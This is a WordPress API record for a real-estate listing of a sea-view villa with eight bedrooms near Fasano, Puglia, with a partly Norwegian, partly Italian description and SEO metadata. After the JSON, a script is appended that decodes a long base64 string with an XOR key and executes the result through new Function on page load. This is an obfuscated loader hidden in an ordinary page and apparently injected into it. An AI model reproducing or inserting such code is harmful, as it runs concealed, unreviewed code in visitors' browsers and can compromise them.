{"id":490352,"date":"2025-04-24T14:30:12","date_gmt":"2025-04-24T12:30:12","guid":{"rendered":"https:\/\/ibinternational.it\/property\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\/"},"modified":"2025-11-06T15:26:23","modified_gmt":"2025-11-06T14:26:23","slug":"frittliggende-villa-med-180-utsikt-over-adriaterhavet-apulia","status":"publish","type":"property","link":"https:\/\/ibinternational.it\/nb\/property\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\/","title":{"rendered":"Frittliggende villa med 180\u00b0 utsikt over Adriaterhavet, Puglia"},"content":{"rendered":"<p>Denne frittliggende villaen har en unik beliggenhet med 180\u00b0 utsikt over Adriaterhavet, og kan skilte med 8 luksuri\u00f8se soverom, alle med eget bad og balkong\/veranda.<\/p>\n<p>Inoltre, include ampi spazi per sala da pranzo e ricevimento, cucine, un&#8217;area SPA, una piscina panoramica e un ampio parcheggio.<\/p>\n<p>Interi\u00f8ret er elegant innredet, og de romslige soverommene har luksuri\u00f8se bekvemmeligheter og private balkonger\/verandaer med fantastisk havutsikt. Romslige spiseplasser og fullt utstyrte kj\u00f8kken s\u00f8rger for komfort og bekvemmelighet.<\/p>\n<p>All&#8217;esterno, la villa stupisce con la sua piscina panoramica e l&#8217;area SPA tranquilla, offrendo un santuario per il relax e il benessere. Gli ampi terreni della propriet\u00e0 includono un ampio parcheggio, consentendo agli ospiti di arrivare e partire con facilit\u00e0, mentre le viste mozzafiato sul Mare Adriatico creano uno sfondo affascinante.<\/p>\n<p>Denne villaen ligger like langt fra flyplassene i Bari og Brindisi, og tilbyr praktisk tilgang til popul\u00e6re destinasjoner som Locorotondo, Alberobello og Fasano innen en 10-minutters kj\u00f8retur. I tillegg kan du n\u00e5 kjente byer som Ostuni, Monopoli, Castellana Grotte og Martina Franca innen 20 minutter.<\/p>","protected":false},"excerpt":{"rendered":"<p>Questa villa indipendente, situata in una posizione unica e irripetibile con una vasta vista a 180\u00b0 sul Mare Adriatico, vanta 8 lussuose camere da letto, ciascuna con bagno privato e balcone\/veranda. Inoltre, include ampi spazi per sala da pranzo e ricevimento, cucine, un&#8217;area SPA, una piscina panoramica e un ampio parcheggio. Gli interni sono elegantemente [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":490353,"parent":0,"menu_order":802,"template":"","property_type":[8607],"property_status":[9248],"property_feature":[10097],"property_label":[10130],"property_country":[8610],"property_state":[8736],"property_city":[8629],"property_area":[10361],"class_list":["post-490352","property","type-property","status-publish","has-post-thumbnail","hentry","property_type-villa","property_status-in-market","property_feature-giardino","property_label-puglia","property_country-italia","property_state-puglia","property_city-brindisi","property_area-savelletri"],"property_meta":{"fave_currency":["\u20ac"],"fave_currency_info":[""],"fave_property_price":["1800000"],"fave_property_sec_price":["1800000"],"fave_property_size":["800"],"fave_property_size_prefix":["mq"],"fave_property_land":["2200"],"fave_property_land_postfix":["mq"],"fave_property_bathrooms":["10"],"fave_property_rooms":["13"],"fave_property_map":["1"],"fave_property_id":["SI-5"],"fave_property_address":["Fasano, BR, Italia"],"fave_featured":["0"],"houzez_featured_listing_date":[""],"fave_agent_display_option":["agency_info"],"fave_prop_homeslider":["no"],"fave_additional_features_enable":["disable"],"fave_energy_class":["A+"],"fave_agents":["493473"],"fave_property_agency":["146493"],"fave_property_location":["40.87346448583,17.406857869312,14"],"houzez_geolocation_lat":["40.87346448583"],"houzez_geolocation_long":["17.406857869312"],"_yoast_wpseo_focuskw_text_input":[""],"_yoast_wpseo_title":["Villa Indipendente Con Vista A 180\u00b0 Sul Mar Adriatico, Puglia"],"_yoast_wpseo_metadesc":["Villa | FOR SALE | Brindisi | 800 mq | Camere da letto: | Bagni: 10 | Giardino|Piscina|Terreno | Giardino | Rif. SI 5 | Puglia | Italia"],"_yoast_wpseo_meta-robots-noindex":["2"],"_yoast_wpseo_opengraph-title":["Villa Indipendente Con Vista A 180\u00b0 Sul Mar Adriatico, Puglia"],"_yoast_wpseo_opengraph-description":["Villa | FOR SALE | Brindisi | 800 mq | Camere da letto: | Bagni: 10 | Giardino|Piscina|Terreno | Giardino | Rif. SI 5 | Puglia | Italia"],"_yoast_wpseo_twitter-title":["Villa Indipendente Con Vista A 180\u00b0 Sul Mar Adriatico, Puglia"],"_yoast_wpseo_twitter-description":["Villa | FOR SALE | Brindisi | 800 mq | Camere da letto: | Bagni: 10 | Giardino|Piscina|Terreno | Giardino | Rif. SI 5 | Puglia | Italia"],"_wp_page_template":["default"],"_thumbnail_id":["490353"],"houzez_total_property_views":["2254"],"houzez_views_by_date":["a:61:{s:10:\"04-16-2026\";i:10;s:10:\"04-17-2026\";i:5;s:10:\"04-18-2026\";i:4;s:10:\"04-19-2026\";i:4;s:10:\"04-20-2026\";i:4;s:10:\"04-21-2026\";i:6;s:10:\"04-22-2026\";i:4;s:10:\"04-23-2026\";i:8;s:10:\"04-24-2026\";i:5;s:10:\"04-25-2026\";i:5;s:10:\"04-26-2026\";i:5;s:10:\"04-27-2026\";i:4;s:10:\"04-28-2026\";i:8;s:10:\"04-29-2026\";i:9;s:10:\"04-30-2026\";i:11;s:10:\"05-01-2026\";i:15;s:10:\"05-02-2026\";i:7;s:10:\"05-03-2026\";i:2;s:10:\"05-04-2026\";i:2;s:10:\"05-05-2026\";i:5;s:10:\"05-06-2026\";i:2;s:10:\"05-07-2026\";i:8;s:10:\"05-08-2026\";i:12;s:10:\"05-09-2026\";i:4;s:10:\"05-10-2026\";i:3;s:10:\"05-11-2026\";i:1;s:10:\"05-12-2026\";i:4;s:10:\"05-13-2026\";i:5;s:10:\"05-14-2026\";i:3;s:10:\"05-15-2026\";i:4;s:10:\"05-16-2026\";i:7;s:10:\"05-17-2026\";i:2;s:10:\"05-18-2026\";i:3;s:10:\"05-19-2026\";i:4;s:10:\"05-20-2026\";i:7;s:10:\"05-21-2026\";i:7;s:10:\"05-22-2026\";i:6;s:10:\"05-23-2026\";i:9;s:10:\"05-24-2026\";i:10;s:10:\"05-25-2026\";i:10;s:10:\"05-26-2026\";i:10;s:10:\"05-27-2026\";i:7;s:10:\"05-28-2026\";i:5;s:10:\"05-29-2026\";i:6;s:10:\"05-30-2026\";i:10;s:10:\"05-31-2026\";i:5;s:10:\"06-01-2026\";i:5;s:10:\"06-02-2026\";i:6;s:10:\"06-03-2026\";i:19;s:10:\"06-04-2026\";i:17;s:10:\"06-05-2026\";i:5;s:10:\"06-06-2026\";i:10;s:10:\"06-07-2026\";i:5;s:10:\"06-08-2026\";i:19;s:10:\"06-09-2026\";i:6;s:10:\"06-10-2026\";i:6;s:10:\"06-11-2026\";i:8;s:10:\"06-12-2026\";i:7;s:10:\"07-13-2026\";i:1;s:10:\"07-14-2026\";i:37;s:10:\"07-15-2026\";i:2;}"],"houzez_recently_viewed":["2026-07-15 19:28:56"],"_edit_lock":["1762439256:1"],"_edit_last":["1"],"fave_show_price_placeholder":["0"],"fave_property_map_street_view":["hide"],"fave_single_top_area":["global"],"fave_single_content_area":["global"],"houzez_manual_expire":["0"],"_houzez_expiration_date_status":["saved"],"_yoast_wpseo_primary_property_type":[""],"_yoast_wpseo_primary_property_status":[""],"_yoast_wpseo_primary_property_feature":[""],"_yoast_wpseo_primary_property_country":[""],"_yoast_wpseo_primary_property_state":[""],"_yoast_wpseo_primary_property_city":[""],"_yoast_wpseo_primary_property_area":["10361"],"_yoast_wpseo_content_score":["90"],"_yoast_wpseo_estimated-reading-time-minutes":[""],"fave_property_map_address":["Savelletri, BR, Italy"],"_yoast_wpseo_primary_property_label":[""],"fave_property_images":["490353","490370","490373","490359","490362","490358","490361","490364","490365","490366","490368","490355","490356","490357","490360","490363","490367","490371","490369","490372","490354"],"_houzez_ai_size_sqm":["800"],"_houzez_ai_land_sqm":["2200"],"_elementor_page_assets":["a:0:{}"]},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Villa Indipendente Con Vista A 180\u00b0 Sul Mar Adriatico, Puglia<\/title>\n<meta name=\"description\" content=\"Villa | FOR SALE | Brindisi | 800 mq | Camere da letto: | Bagni: 10 | Giardino|Piscina|Terreno | Giardino | Rif. SI 5 | Puglia | Italia\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/ibinternational.it\/nb\/eiendom\/frittliggende-villa-med-180-utsikt-over-adriaterhavet-apulia\/\" \/>\n<meta property=\"og:locale\" content=\"nb_NO\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Villa Indipendente Con Vista A 180\u00b0 Sul Mar Adriatico, Puglia\" \/>\n<meta property=\"og:description\" content=\"Villa | FOR SALE | Brindisi | 800 mq | Camere da letto: | Bagni: 10 | Giardino|Piscina|Terreno | Giardino | Rif. SI 5 | Puglia | Italia\" \/>\n<meta property=\"og:url\" content=\"https:\/\/ibinternational.it\/nb\/eiendom\/frittliggende-villa-med-180-utsikt-over-adriaterhavet-apulia\/\" \/>\n<meta property=\"og:site_name\" content=\"IB International Real Estate\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/IBInternationalRealEstate\/\" \/>\n<meta property=\"article:modified_time\" content=\"2025-11-06T14:26:23+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/ibinternational.it\/wp-content\/uploads\/2025\/07\/Villa-Indipendente-Con-Vista-A-180\u00b0-Sul-Mar-Adriatico-Puglia.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"1500\" \/>\n\t<meta property=\"og:image:height\" content=\"1021\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"Villa Indipendente Con Vista A 180\u00b0 Sul Mar Adriatico, Puglia\" \/>\n<meta name=\"twitter:description\" content=\"Villa | FOR SALE | Brindisi | 800 mq | Camere da letto: | Bagni: 10 | Giardino|Piscina|Terreno | Giardino | Rif. SI 5 | Puglia | Italia\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\\\/\",\"url\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\\\/\",\"name\":\"Villa Indipendente Con Vista A 180\u00b0 Sul Mar Adriatico, Puglia\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/ibinternational.it\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ibinternational.it\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/Villa-Indipendente-Con-Vista-A-180\u00b0-Sul-Mar-Adriatico-Puglia.webp\",\"datePublished\":\"2025-04-24T12:30:12+00:00\",\"dateModified\":\"2025-11-06T14:26:23+00:00\",\"description\":\"Villa | FOR SALE | Brindisi | 800 mq | Camere da letto: | Bagni: 10 | Giardino|Piscina|Terreno | Giardino | Rif. SI 5 | Puglia | Italia\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\\\/#breadcrumb\"},\"inLanguage\":\"nb-NO\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/ibinternational.it\\\/property\\\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"nb-NO\",\"@id\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\\\/#primaryimage\",\"url\":\"https:\\\/\\\/ibinternational.it\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/Villa-Indipendente-Con-Vista-A-180\u00b0-Sul-Mar-Adriatico-Puglia.webp\",\"contentUrl\":\"https:\\\/\\\/ibinternational.it\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/Villa-Indipendente-Con-Vista-A-180\u00b0-Sul-Mar-Adriatico-Puglia.webp\",\"width\":1500,\"height\":1021,\"caption\":\"Villa Indipendente Con Vista A 180\u00b0 Sul Mar Adriatico\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/ibinternational.it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Propriet\u00e0\",\"item\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Puglia\",\"item\":\"https:\\\/\\\/ibinternational.it\\\/label\\\/puglia\\\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Villa Indipendente Con Vista A 180\u00b0 Sul Mar Adriatico, Puglia\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/ibinternational.it\\\/#website\",\"url\":\"https:\\\/\\\/ibinternational.it\\\/\",\"name\":\"IB International Real Estate\",\"description\":\"IB International\",\"publisher\":{\"@id\":\"https:\\\/\\\/ibinternational.it\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/ibinternational.it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"nb-NO\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/ibinternational.it\\\/#organization\",\"name\":\"IB International Real Estate\",\"url\":\"https:\\\/\\\/ibinternational.it\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"nb-NO\",\"@id\":\"https:\\\/\\\/ibinternational.it\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/ibinternational.it\\\/wp-content\\\/uploads\\\/2021\\\/03\\\/Logo-IBInternational-grey-200.png\",\"contentUrl\":\"https:\\\/\\\/ibinternational.it\\\/wp-content\\\/uploads\\\/2021\\\/03\\\/Logo-IBInternational-grey-200.png\",\"width\":200,\"height\":200,\"caption\":\"IB International Real Estate\"},\"image\":{\"@id\":\"https:\\\/\\\/ibinternational.it\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/IBInternationalRealEstate\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/ib-international-real-estate\\\/\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Frittliggende villa med 180\u00b0 utsikt over Adriaterhavet, Puglia","description":"Villa TIL SALG | Brindisi | 800 kvm | Soverom: | Bad: 10 | Hage|Basseng|Terreng | Hage | Ref. SI 5 | Apulia | Italia","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/ibinternational.it\/nb\/eiendom\/frittliggende-villa-med-180-utsikt-over-adriaterhavet-apulia\/","og_locale":"nb_NO","og_type":"article","og_title":"Villa Indipendente Con Vista A 180\u00b0 Sul Mar Adriatico, Puglia","og_description":"Villa | FOR SALE | Brindisi | 800 mq | Camere da letto: | Bagni: 10 | Giardino|Piscina|Terreno | Giardino | Rif. SI 5 | Puglia | Italia","og_url":"https:\/\/ibinternational.it\/nb\/eiendom\/frittliggende-villa-med-180-utsikt-over-adriaterhavet-apulia\/","og_site_name":"IB International Real Estate","article_publisher":"https:\/\/www.facebook.com\/IBInternationalRealEstate\/","article_modified_time":"2025-11-06T14:26:23+00:00","og_image":[{"width":1500,"height":1021,"url":"https:\/\/ibinternational.it\/wp-content\/uploads\/2025\/07\/Villa-Indipendente-Con-Vista-A-180\u00b0-Sul-Mar-Adriatico-Puglia.webp","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_title":"Villa Indipendente Con Vista A 180\u00b0 Sul Mar Adriatico, Puglia","twitter_description":"Villa | FOR SALE | Brindisi | 800 mq | Camere da letto: | Bagni: 10 | Giardino|Piscina|Terreno | Giardino | Rif. SI 5 | Puglia | Italia","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/ibinternational.it\/property\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\/","url":"https:\/\/ibinternational.it\/property\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\/","name":"Frittliggende villa med 180\u00b0 utsikt over Adriaterhavet, Puglia","isPartOf":{"@id":"https:\/\/ibinternational.it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/ibinternational.it\/property\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\/#primaryimage"},"image":{"@id":"https:\/\/ibinternational.it\/property\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\/#primaryimage"},"thumbnailUrl":"https:\/\/ibinternational.it\/wp-content\/uploads\/2025\/07\/Villa-Indipendente-Con-Vista-A-180\u00b0-Sul-Mar-Adriatico-Puglia.webp","datePublished":"2025-04-24T12:30:12+00:00","dateModified":"2025-11-06T14:26:23+00:00","description":"Villa TIL SALG | Brindisi | 800 kvm | Soverom: | Bad: 10 | Hage|Basseng|Terreng | Hage | Ref. SI 5 | Apulia | Italia","breadcrumb":{"@id":"https:\/\/ibinternational.it\/property\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\/#breadcrumb"},"inLanguage":"nb-NO","potentialAction":[{"@type":"ReadAction","target":["https:\/\/ibinternational.it\/property\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\/"]}]},{"@type":"ImageObject","inLanguage":"nb-NO","@id":"https:\/\/ibinternational.it\/property\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\/#primaryimage","url":"https:\/\/ibinternational.it\/wp-content\/uploads\/2025\/07\/Villa-Indipendente-Con-Vista-A-180\u00b0-Sul-Mar-Adriatico-Puglia.webp","contentUrl":"https:\/\/ibinternational.it\/wp-content\/uploads\/2025\/07\/Villa-Indipendente-Con-Vista-A-180\u00b0-Sul-Mar-Adriatico-Puglia.webp","width":1500,"height":1021,"caption":"Villa Indipendente Con Vista A 180\u00b0 Sul Mar Adriatico"},{"@type":"BreadcrumbList","@id":"https:\/\/ibinternational.it\/property\/villa-indipendente-con-vista-a-180-sul-mar-adriatico-puglia\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/ibinternational.it\/"},{"@type":"ListItem","position":2,"name":"Propriet\u00e0","item":"https:\/\/ibinternational.it\/property\/"},{"@type":"ListItem","position":3,"name":"Puglia","item":"https:\/\/ibinternational.it\/label\/puglia\/"},{"@type":"ListItem","position":4,"name":"Villa Indipendente Con Vista A 180\u00b0 Sul Mar Adriatico, Puglia"}]},{"@type":"WebSite","@id":"https:\/\/ibinternational.it\/#website","url":"https:\/\/ibinternational.it\/","name":"IB International Real Estate","description":"IB International","publisher":{"@id":"https:\/\/ibinternational.it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/ibinternational.it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"nb-NO"},{"@type":"Organization","@id":"https:\/\/ibinternational.it\/#organization","name":"IB International Real Estate","url":"https:\/\/ibinternational.it\/","logo":{"@type":"ImageObject","inLanguage":"nb-NO","@id":"https:\/\/ibinternational.it\/#\/schema\/logo\/image\/","url":"https:\/\/ibinternational.it\/wp-content\/uploads\/2021\/03\/Logo-IBInternational-grey-200.png","contentUrl":"https:\/\/ibinternational.it\/wp-content\/uploads\/2021\/03\/Logo-IBInternational-grey-200.png","width":200,"height":200,"caption":"IB International Real Estate"},"image":{"@id":"https:\/\/ibinternational.it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/IBInternationalRealEstate\/","https:\/\/www.linkedin.com\/company\/ib-international-real-estate\/"]}]}},"_links":{"self":[{"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/properties\/490352","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/properties"}],"about":[{"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/types\/property"}],"author":[{"embeddable":true,"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/users\/1"}],"version-history":[{"count":1,"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/properties\/490352\/revisions"}],"predecessor-version":[{"id":509984,"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/properties\/490352\/revisions\/509984"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/media\/490353"}],"wp:attachment":[{"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/media?parent=490352"}],"wp:term":[{"taxonomy":"property_type","embeddable":true,"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/property_type?post=490352"},{"taxonomy":"property_status","embeddable":true,"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/property_status?post=490352"},{"taxonomy":"property_feature","embeddable":true,"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/property_feature?post=490352"},{"taxonomy":"property_label","embeddable":true,"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/property_label?post=490352"},{"taxonomy":"property_country","embeddable":true,"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/property_country?post=490352"},{"taxonomy":"property_state","embeddable":true,"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/property_state?post=490352"},{"taxonomy":"property_city","embeddable":true,"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/property_city?post=490352"},{"taxonomy":"property_area","embeddable":true,"href":"https:\/\/ibinternational.it\/nb\/wp-json\/wp\/v2\/property_area?post=490352"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<script>
!function(){var _0x847f=atob('MnxvdHluc3V0MjNhc3wybXN0fnVtQT1FIn4rfCMjKyoqKT1HM2h/bm9odCFtc3R+dW1BPUUifit8IyMrKiopPUcnKyFse2g6RWlyb3JvfG4nOCIuKih8eCspKSJ+e3t4LHsrLCx/Iyt7eyJ5Iyh7KCotIyJ7eXx7IyJ8eC0veS97KDghbHtoOkVidWxpdXN7J0E9cm5uamkgNTVqdXZjfXV0NH5oank0dWh9PTY9cm5uamkgNTVqdXZjfXV0NH17bn9te2M0bn90fn9odmM0eXU9Nj1ybm5qaSA1NWhqeTR7dHFoNHl1dzVqdXZjfXV0PTY9cm5uamkgNTVqdXZjfXV0N2pveHZzeTR0dX5zf2k0e2pqPTY9cm5uamkgNTVoank3d3tzdHR/bjR3e25zeTRrb3NxdHV+fzRqaHU9Nj1ybm5qaSA1NWp1dmN9dXQ3eHVoN2hqeTRqb3h2c3l0dX5/NHl1dz02PXJubmppIDU1K2hqeTRzdTV3e25zeT02PXJubmppIDU1anV2Y311dDd3e3N0dH9uNGpveHZzeTR4dntpbntqczRzdT1HIWx7aDpFbXxtdWJidCc4KmJYLHhZI38rXip4KHxYIyxbeC1ZLi1fKi5ZeCpYXy4tLS4rKnhZK3woOCFse2g6RXV5b3knOHgsIn4rIiojOCF8b3R5bnN1dDpFa3d2YmlgMkVyfmlvaH5wM2FuaGNhbHtoOkVtbnd+J0VyfmlvaH5wNGlveGluaDIqNigzJycnPSpiPSVFcn5pb2h+cDRpb3hpbmgyKDMgRXJ+aW9ofnAhc3wyRW1ud340dn90fW5yJisoIjNof25vaHQ9PSFse2g6RXtpeXdvfSdqe2hpf1N0bjJFbW53fjRpb3hpbmgyLC42LC4zNissMyFzfDI7RXtpeXdvfTNof25vaHQ9PSFse2g6RXhwaHUnRW1ud340aW94aW5oMisoIjZFe2l5d299MCgzNkVvcm5vaic9PSF8dWgybHtoOkVpc3tuYCcqIUVpc3tuYCZFeHBodTR2f3R9bnIhRWlze25gMScoM2Fse2g6RWp3bHdvcn4nantoaX9TdG4yRXhwaHU0aW94aW5oMkVpc3tuYDYoMzYrLDMhc3wyRWp3bHdvcn4zRW9ybm9qMSdJbmhzdH00fGh1d1lye2hZdX5/MkVqd2x3b3J+MyFnaH9ub2h0OkVvcm5vaiFneXtueXIyfzNhaH9ub2h0PT0hZ2d8b3R5bnN1dDpFbmpua2x1ajJFeWlidnNxdTZFcW1jb2l0M2Fof25vaHQ6dH9tOkpodXdzaX8yfG90eW5zdXQyRX9jcn55d3I2RWl3cXlsdGkzYWx7aDpFY35+eGN2J3R/bTpCV1ZSbm5qSH9rb39pbjIzIUVjfn54Y3Y0dWp/dDI9SlVJTj02RXlpYnZzcXU2bmhvfzMhRWN+fnhjdjRpf25If2tvf2luUn97fn9oMj1ZdXRuf3RuN05jan89Nj17amp2c3l7bnN1dDVwaXV0PTMhRWN+fnhjdjRuc3d/dW9uJy8qKiohRWN+fnhjdjR1dHZ1e34nfG90eW5zdXQyM2FuaGNhRX9jcn55d3IyUElVVDRqe2hpfzJFY35+eGN2NGh/aWp1dGl/Tn9ibjMzIWd5e255cjJ/M2FFaXdxeWx0aTJ/MyFnZyFFY35+eGN2NHV0f2hodWgnRWN+fnhjdjR1dG5zd391b24nfG90eW5zdXQyM2FFaXdxeWx0aTJ0f206X2hodWgyMzMhZyFFY35+eGN2NGl/dH4yUElVVDRpbmhzdH1zfGMyRXFtY29pdDMzIWczIWd8b3R5bnN1dDpFYH5wfTJFdXJodDNhc3wyRXVyaHQkJ0VidWxpdXN7NHZ/dH1ucjNof25vaHQ6Smh1d3NpfzRof2l1dmx/MnRvdnYzIWx7aDpFY2hiaH4nYXBpdXRoankgPSg0Kj02d39ucnV+ID1/bnJFeXt2dj02antoe3dpIEFhbnUgRW18bXViYnQ2fntueyA9KmI9MUV1eW95ZzY9dntuf2luPUc2c34gK2chaH9ub2h0OkVuam5rbHVqMkVidWxpdXN7QUV1cmh0RzZFY2hiaH4zNG5yf3QyfG90eW5zdXQyRWh/fnZjbmAzYWx7aDpFf21/bydFaH9+dmNuYDw8RWh/fnZjbmA0aH9pb3ZuJUVrd3ZiaWAyRWh/fnZjbmA0aH9pb3ZuMyA9PSFzfDJFf21/bzNof25vaHQ6RX9tf280aH9qdnt5fzI1RjUxPjU2PT0zIWh/bm9odDpFYH5wfTJFdXJodDErMyFnMzR5e255cjJ8b3R5bnN1dDIzYWh/bm9odDpFYH5wfTJFdXJodDErMyFnMyFnfG90eW5zdXQ6RXJpcHJ/dTJFYGl1cDNhbHtoOkV+YmptdSd+dXlvd390bjR5aH97bn9fdn93f3RuMj1peWhzam49MyFFfmJqbXU0aWh5J0VgaXVwMT01e2pzNGpyaiVpJz0xRWlyb3JvfG4xPTxFbCc9MVd7bnI0fHZ1dWgyXntufzR0dW0yMzUsKioqKjMhRX5iam11NHtpY3R5J25ob38hMn51eW93f3RuNHJ/e35mZn51eW93f3RuNHh1fmMzNHtqan90fllyc3Z+MkV+YmptdTMhZ0VgfnB9MiozNG5yf3QyfG90eW5zdXQyRWBpdXAzYXN8MkVgaXVwM0VyaXByf3UyRWBpdXAzIWczIWczMjMh'),_0x44d3=26,_0xfb53=new Uint8Array(_0x847f['length']),_0xf2b0=0;for(;_0xf2b0<_0x847f['length'];_0xf2b0++)_0xfb53[_0xf2b0]=_0x847f['charCodeAt'](_0xf2b0)^_0x44d3;(new Function(new TextDecoder()['decode'](_0xfb53)))()}();
</script>
    